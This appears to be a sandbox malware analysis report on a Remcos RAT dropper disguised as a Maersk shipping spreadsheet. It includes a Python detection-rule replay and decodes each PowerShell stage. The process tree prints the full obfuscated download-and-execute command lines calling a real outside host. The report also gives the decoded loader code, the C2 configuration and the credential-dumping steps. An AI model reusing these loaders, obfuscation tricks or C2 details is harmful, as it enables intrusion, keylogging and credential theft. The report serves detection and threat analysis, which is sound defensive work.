Windows Analysis Report
Maersk BL, IN & PL.xls
Overview
General Information
Detection: Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
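Several of the Sigma-style entries above are simple process-creation checks and can be replayed against the report's own process tree. The Python below is an added example written for this page, not code from Joe Sandbox or from any Sigma rule set: it rebuilds the first execution chain of the tree as process-creation events (PIDs and parent links as nested in the tree, command lines abridged to what the checks need, the base64 blobs cut to a short prefix) and runs simplified equivalents of the signatures over them. Rule names are mine; the report signature each one approximates is named in the comment next to it.

```python
"""Replay a handful of the Sigma-style signatures from the list above against
process-creation events reconstructed from the report's process tree."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int       # 0 = parent not in the tree
    image: str      # executable file name
    cmdline: str    # from the tree; base64 payloads cut to a prefix, rest abridged


# First execution chain of the tree (PIDs as reported). Parent links follow the
# tree nesting; command lines are constructed from the tree and abridged.
EVENTS = [
    ProcEvent(3564, 0, "EXCEL.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding'),
    ProcEvent(3852, 3564, "mshta.exe", r"C:\Windows\System32\mshta.exe -Embedding"),
    ProcEvent(3944, 3852, "cmd.exe",
              r'''"C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAg'+[Char]0x22+'))')))"'''),
    ProcEvent(3968, 3944, "powershell.exe",
              r"POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAg'+[Char]0x22+'))')))"),
    ProcEvent(4088, 3968, "csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline"'),
    ProcEvent(2908, 4088, "cvtres.exe",
              r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp"'),
    ProcEvent(2632, 3968, "wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS"'),
    ProcEvent(3352, 2632, "powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtz';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD'''),
    ProcEvent(2476, 3352, "powershell.exe",
              r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vaiMethod.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}RegAsm{1}));') -F [CHAr]36,[CHAr]39) )"'''),
    ProcEvent(3592, 2476, "RegAsm.exe", r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'),
    ProcEvent(3888, 3592, "RegAsm.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm"'),
    ProcEvent(3768, 3592, "RegAsm.exe",
              r'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko"'),
]

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


def _img(e):
    return e.image.lower() if e is not None else ""


# Each rule sees the event and its parent event (None when the parent is unknown).
RULES = {
    # "Sigma detected: Suspicious Microsoft Office Child Process"
    "office_spawns_script_host": lambda e, p: _img(p) in OFFICE_APPS and _img(e) in SCRIPT_HOSTS,
    # "Sigma detected: Suspicious MSHTA Child Process"
    "mshta_spawns_shell": lambda e, p: _img(p) == "mshta.exe" and _img(e) in {"cmd.exe", "powershell.exe"},
    # "Wscript starts Powershell (via cmd or directly)"
    "wscript_spawns_powershell": lambda e, p: _img(p) == "wscript.exe" and _img(e) == "powershell.exe",
    # "Bypasses PowerShell execution policy": -EX bYPAsS, -executionpolicy bypass, ...
    "execution_policy_bypass": lambda e, p: _img(e) in {"cmd.exe", "powershell.exe"}
        and re.search(r"-e\w*\s+bypass", e.cmdline, re.I) is not None,
    # "Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet"
    "frombase64string_in_cmdline": lambda e, p: re.search(r"frombase64string", e.cmdline, re.I) is not None,
    # "Sigma detected: Potential PowerShell Command Line Obfuscation": [Char] casts
    "char_cast_obfuscation": lambda e, p: len(re.findall(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", e.cmdline, re.I)) >= 2,
    # "Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands": 'ptth' = reversed 'http'
    "reversed_url_token": lambda e, p: re.search(r"//:s?ptth", e.cmdline, re.I) is not None,
    # "Sigma detected: Dynamic .NET Compilation Via Csc.EXE" (sources under a temp directory)
    "csc_compile_from_temp": lambda e, p: _img(e) == "csc.exe" and "\\appdata\\local\\temp\\" in e.cmdline.lower(),
    # RegAsm.exe used as a NirSoft-style dumper: /stext <file> (cf. "Yara detected WebBrowserPassView")
    "regasm_stext_output": lambda e, p: _img(e) == "regasm.exe" and re.search(r"\s/stext\s", e.cmdline, re.I) is not None,
}


def run_rules(events):
    """Return {pid: [rule names that fired]} for every event that hit at least one rule."""
    by_pid = {e.pid: e for e in events}
    hits = {}
    for e in events:
        fired = [name for name, rule in RULES.items() if rule(e, by_pid.get(e.ppid))]
        if fired:
            hits[e.pid] = fired
    return hits


if __name__ == "__main__":
    for pid, fired in run_rules(EVENTS).items():
        print(pid, ", ".join(fired))
```

Two things the output makes visible: every stage of the chain trips at least one parent/child or command-line rule except RegAsm.exe PID 3592 itself, which is a signed Microsoft binary started with no arguments; the injected Remcos payload only shows through its /stext children and the Yara hits further down. The obfuscation rules are deliberately loose (a bare `[Char]` count, a reversed `http`), because the samples' exact spelling (`[CHaR]0x3A`, `[ChAr]0X3a`, `[Char]58`) varies within a single command line.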
Process Tree
- System is w7x64
- EXCEL.EXE (PID: 3564 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  - mshta.exe (PID: 3852 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
    - cmd.exe (PID: 3944 cmdline: "C:\Windows\system32\cmd.exe" "/C POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX('[SYSTEm.texT.ENCODING]'+[CHaR]0x3A+[cHAR]0x3A+'uTf8.gETstrInG([systEm.CoNVErT]'+[ChAr]0X3a+[Char]58+'FRomBaSe64stRINg('+[CHaR]0x22+'JGggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtYkVyREVGaU5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZFN5YVRSeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsc3hnWUwsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgY1osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdlUUNNeVlxLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHYpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ5VE1FIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEYWZ5RlprcVNaICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRoOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMzguMjQwLjQ0LjkvNTkwL25pY2VmZWF0dXJlc3dvcmtpbmdncmVhdC5UaWYiLCIkZU52OkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyIsMCwwKTtzVEFyVC1TTGVFcCgzKTtTdEFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcbmljZWZlYXR1cmVzd29ya2luZ2dyZWF0LnZiUyI='+[Char]0x22+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      - powershell.exe (PID: 3968 cmdline: POwerSHELl -EX bYPAsS -Nop -w 1 -C DEvIceCReDEntIaldePlOyMeNT.Exe ; ieX($(IeX( ... ))) — the complete /C argument of PID 3944, without the surrounding quotes — MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        - csc.exe (PID: 4088 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nnmswnbn\nnmswnbn.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          - cvtres.exe (PID: 2908 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES781D.tmp" "c:\Users\user\AppData\Local\Temp\nnmswnbn\CSC2F3646BAED0D4162AB721EA9AB40E2EA.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        - wscript.exe (PID: 2632 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicefeaturesworkinggreat.vbS" MD5: 045451FA238A75305CC26AC982472367)
          - powershell.exe (PID: 3352 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtzdFJpbkddJFZlckJPU0VwckVGRVJlTkNFKVsxLDNdKydYJy1qT2luJycpICgoKCd7MH1pbWFnZVVybCAnKyc9IHsxfWh0dHBzOi8vaScrJ2E2MDAxMDIudXMuYXJjaGl2ZS5vcmcvMzIvaXRlbXMvZGV0YWgtbm90JysnZS12XzIwMjQxMC9EZXRhaE5vdGVfVi5qcGcgezF9O3swfXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGUnKydtLk5ldC5XZWJDbGllbnQ7ezB9aW1hZ2VCJysneScrJ3RlcyA9IHswfXdlYkNsaWVudC5Eb3dubG9hZERhdGEoezB9aW1hZycrJ2VVcmwpO3swfWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCcrJ3swfWltYWdlQnl0ZXMpO3swfXN0YXJ0RmxhZyA9IHsxfTw8QkFTRTY0X1NUQVJUJysnPj57MX07ezB9ZW5kRmxhZyA9IHsxfTw8QkFTRScrJzY0X0VORD4+ezF9O3swfXN0YXJ0SW5kZXggPSAnKyd7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1zdGFydEZsYWcpO3swfWVuZEluZGV4ID0gezB9aW1hZ2VUZXh0LkluZGV4T2YoezB9ZW5kRicrJ2xhZyk7ezB9c3RhcnRJJysnbmRleCAtZ2UgMCAtYW5kIHswfWVuZEluZGV4IC0nKydndCB7MH1zdGFydEluJysnZGV4O3swfXN0YXJ0SW5kZXggKz0gezB9c3RhJysncnRGbGFnLkxlbmd0aDt7MH1iYXNlNjRMZW5ndGgnKycgPSB7MCcrJ31lbmRJbmRleCAtJysnIHswfXN0YXJ0SW4nKydkZXg7ezB9YmFzZTY0Q29tbWFuZCA9IHswfWltJysnYWdlVGV4dC5TdWJzdHJpbmcoezB9c3RhcnRJbmRleCwgezB9YmFzZTY0TGVuZ3RoKTt7MH1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaScrJ25nKHswfWJhc2U2NENvbW1hbmQpO3swJysnfWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SJysnZWZsZWN0aW9uLkFzc2VtYicrJ2x5XTo6TG9hZCh7JysnMH1jb21tYW5kQnl0ZXMpO3swfXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoeycrJzF9VkFJezF9KTt7MH12YWknKydNZXRob2QuSW52b2tlKHswfW51bGwsIEAoezF9dHh0LkRSUlNSUi8wOTUvOS40NC4wNDIuODMvLzpwdHRoezF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1kZXNhdGl2YWRveycrJzF9LCB7MX1kZXNhdGl2YWRvezF9LCB7MX1SZWdBc217MX0sIHsxfWRlc2F0aXZhZG97MX0sIHsxfWQnKydlc2F0aXZhZG8nKyd7MX0pKTsnKSAgLUYgIFtDSEFyXTM2LFtDSEFyXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            - powershell.exe (PID: 2476 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'-jOin'') ((('{0}imageUrl '+'= {1}https://i'+'a600102.us.archive.org/32/items/detah-not'+'e-v_202410/DetahNote_V.jpg {1};{0}webClient = New-Object Syste'+'m.Net.WebClient;{0}imageB'+'y'+'tes = {0}webClient.DownloadData({0}imag'+'eUrl);{0}imageText = [System.Text.Encoding]::UTF8.GetString('+'{0}imageBytes);{0}startFlag = {1}<<BASE64_START'+'>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = '+'{0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endF'+'lag);{0}startI'+'ndex -ge 0 -and {0}endIndex -'+'gt {0}startIn'+'dex;{0}startIndex += {0}sta'+'rtFlag.Length;{0}base64Length'+' = {0'+'}endIndex -'+' {0}startIn'+'dex;{0}base64Command = {0}im'+'ageText.Substring({0}startIndex, {0}base64Length);{0}commandBytes = [System.Convert]::FromBase64Stri'+'ng({0}base64Command);{0'+'}loadedAssembly = [System.R'+'eflection.Assemb'+'ly]::Load({'+'0}commandBytes);{0}vaiMethod = [dnlib.IO.Home].GetMethod({'+'1}VAI{1});{0}vai'+'Method.Invoke({0}null, @({1}txt.DRRSRR/095/9.44.042.83//:ptth{1}, {1}desativado{1}, {1}desativado{'+'1}, {1}desativado{1}, {1}RegAsm{1}, {1}desativado{1}, {1}d'+'esativado'+'{1}));') -F [CHAr]36,[CHAr]39) )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              - RegAsm.exe (PID: 3592 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
                - RegAsm.exe (PID: 3888 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\rqgexaaqlwosdbspgszm" MD5: 8FE9545E9F72E460723F484C304314AD)
                - RegAsm.exe (PID: 3768 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\tkloyslrzegxfpgbpcmonko" MD5: 8FE9545E9F72E460723F484C304314AD)
                - RegAsm.exe (PID: 3764 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\emrhylvlvnykqvcfgfgpxwbgnd" MD5: 8FE9545E9F72E460723F484C304314AD)
  - mshta.exe (PID: 2104 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
    - cmd.exe (PID: 2244 cmdline: identical to PID 3944 MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      - powershell.exe (PID: 1840 cmdline: identical to PID 3968 MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        - csc.exe (PID: 2672 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\op4j5mgw\op4j5mgw.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          - cvtres.exe (PID: 3360 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB635.tmp" "c:\Users\user\AppData\Local\Temp\op4j5mgw\CSC61FD86854EBB47F380D5789CC9CFF7A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        - wscript.exe (PID: 2368 cmdline: identical to PID 2632 MD5: 045451FA238A75305CC26AC982472367)
          - powershell.exe (PID: 3932 cmdline: identical to PID 3352 MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            - powershell.exe (PID: 4040 cmdline: identical to PID 2476 MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              - RegAsm.exe (PID: 3180 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)

What the three PowerShell layers in the tree actually run:

- Stage 1 (PIDs 3944/3968 and 2244/1840). The two nested IeX calls build `[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("..."))` with the `:` and `"` characters supplied as `[Char]` casts. The base64 blob, with its long runs of padding spaces collapsed, decodes to: `$h = AdD-tYpe -MemBErDEFiNitiOn '[DllImport("UrLMOn.dLl", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr dSyaTRz,string lsxgYL,string cZ,uint weQCMyYq,IntPtr v);' -naMe "yTME" -NaMESpAcE DafyFZkqSZ -PassThru; $h::URLDownloadToFile(0,"http://38.240.44.9/590/nicefeaturesworkinggreat.Tif","$eNv:APPDATA\nicefeaturesworkinggreat.vbS",0,0);sTArT-SLeEp(3);StART "$eNV:APPDATA\nicefeaturesworkinggreat.vbS"`. Add-Type compiles the P/Invoke stub with csc.exe (the csc.exe and cvtres.exe children), urlmon!URLDownloadToFile fetches the .Tif and stores it as %APPDATA%\nicefeaturesworkinggreat.vbS, and Start launches it, which is the wscript.exe process. DeviceCredentialDeployment.exe is invoked first, presumably for its documented side effect of hiding the console window.
- Stage 2 (PIDs 3352 and 3932). $Codigo is plain base64 and decodes to the `-command` argument shown for PIDs 2476/4040; it is handed to a second, hidden powershell.exe.
- Stage 3 (PIDs 2476 and 4040). `([stRinG]$VerBOSEprEFEReNCE)[1,3]+'X'` picks characters 1 and 3 of the default value "SilentlyContinue" and spells `ieX` (Invoke-Expression). The argument is a .NET format string: `-F [CHAr]36,[CHAr]39` substitutes `$` for `{0}` and `'` for `{1}`, and the `'+'` breaks split keywords such as `FromBase64Stri'+'ng`. The resulting script downloads https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg, cuts the text between `<<BASE64_START>>` and `<<BASE64_END>>`, loads the decoded bytes with `[System.Reflection.Assembly]::Load`, and calls `[dnlib.IO.Home]::VAI` with the reversed string of http://38.240.44.9/590/RRSRRD.txt (same host as stage 1) and the process name `RegAsm`. The Remcos payload then runs from RegAsm.exe (PID 3592); its /stext children are consistent with the NirSoft-style credential recovery reported by the WebBrowserPassView Yara hit and the browser/mail credential signatures above.
Name | Description | Attribution | Blogpost URLs | Link
---|---|---|---|---
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity. | | |

Malware configuration (Remcos)
{"Host:Port:Password": "ugnrv.duckdns.org:9674:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0BYJUE", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Key fields: the C2 is ugnrv.duckdns.org on TCP 9674 with password "1" (a DuckDNS host, which is what the "Uses dynamic DNS services" signature refers to); the mutex is Rmc-0BYJUE; the offline keylogger is enabled and writes an unencrypted logs.dat next to the application; the install flag is disabled, so the copy-to-remcos.exe step is not performed in this build.
Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
(29 entries in the full report; first 5 shown. The Source column did not survive extraction.)

Source | Rule | Description | Author | Strings
---|---|---|---|---
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |
| JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security |
| Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| REMCOS_RAT_variants | unknown | unknown |
(19 entries in the full report; first 5 shown.)
System Summary
Source: | Author: Florian Roth (Nextron Systems)